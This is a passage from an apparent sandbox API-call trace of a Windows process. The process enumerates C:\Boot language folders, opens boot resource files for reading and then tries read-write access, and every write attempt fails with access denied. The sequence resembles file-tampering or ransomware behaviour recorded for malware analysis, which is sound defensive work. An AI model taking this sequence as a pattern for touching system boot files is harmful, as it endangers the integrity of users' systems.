hHeap=0x20000) returned 1 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0084.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.019] AreFileApisANSI () returned 1 [0084.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui", lpUsedDefaultChar=0x0) returned 40 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.019] AreFileApisANSI () returned 1 [0084.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0084.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0084.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=40 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 40 [0084.020] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0084.020] GetFileType (hFile=0x340) returned 0x1 [0084.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0084.020] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.020] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.020] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.020] CloseHandle (hObject=0x340) returned 1 [0084.020] AreFileApisANSI () returned 1 [0084.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0084.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0084.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d580, cchWideChar=40 | out: lpWideCharStr="C:\\Boot\\Resources\\en-US\\bootres.dll.mui") returned 40 [0084.021] CreateFileW (lpFileName="C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.021] GetLastError () returned 0x5 [0084.021] GetLastError () returned 0x5 [0084.021] SetLastError (dwErrCode=0x5) [0084.021] GetLastError () returned 0x5 [0084.021] SetLastError (dwErrCode=0x5) [0084.021] GetLastError () returned 0x5 [0084.021] SetLastError (dwErrCode=0x5) [0084.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0084.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.021] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x4e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67548, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x4e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="i", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⾠")) returned 0 [0084.021] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0084.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0084.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0084.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.261] AreFileApisANSI () returned 1 [0084.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ro-RO", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ro-RO", lpUsedDefaultChar=0x0) returned 14 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.261] AreFileApisANSI () returned 1 [0084.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0084.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ro-RO") returned 14 [0084.262] CreateFileW (lpFileName="C:\\Boot\\ro-RO" (normalized: "c:\\boot\\ro-ro"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.262] GetLastError () returned 0x5 [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.262] AreFileApisANSI () returned 1 [0084.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88720 [0084.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ro-RO") returned 14 [0084.262] CreateFileW (lpFileName="C:\\Boot\\ro-RO" (normalized: "c:\\boot\\ro-ro"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.262] GetLastError () returned 0x5 [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] GetLastError () returned 0x5 [0084.262] SetLastError (dwErrCode=0x5) [0084.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.263] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.263] FindFirstFileExW (in: lpFileName="C:\\Boot\\ro-RO\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0084.263] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.263] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0084.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.264] AreFileApisANSI () returned 1 [0084.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.265] AreFileApisANSI () returned 1 [0084.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52fc8 [0084.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x52fc8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 30 [0084.265] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.265] GetFileType (hFile=0x348) returned 0x1 [0084.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.265] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.266] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.266] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.266] CloseHandle (hObject=0x348) returned 1 [0084.266] AreFileApisANSI () returned 1 [0084.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ro-RO\\bootmgr.exe.mui") returned 30 [0084.266] CreateFileW (lpFileName="C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.266] GetLastError () returned 0x5 [0084.266] GetLastError () returned 0x5 [0084.266] SetLastError (dwErrCode=0x5) [0084.266] GetLastError () returned 0x5 [0084.266] SetLastError (dwErrCode=0x5) [0084.266] GetLastError () returned 0x5 [0084.266] SetLastError (dwErrCode=0x5) [0084.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: 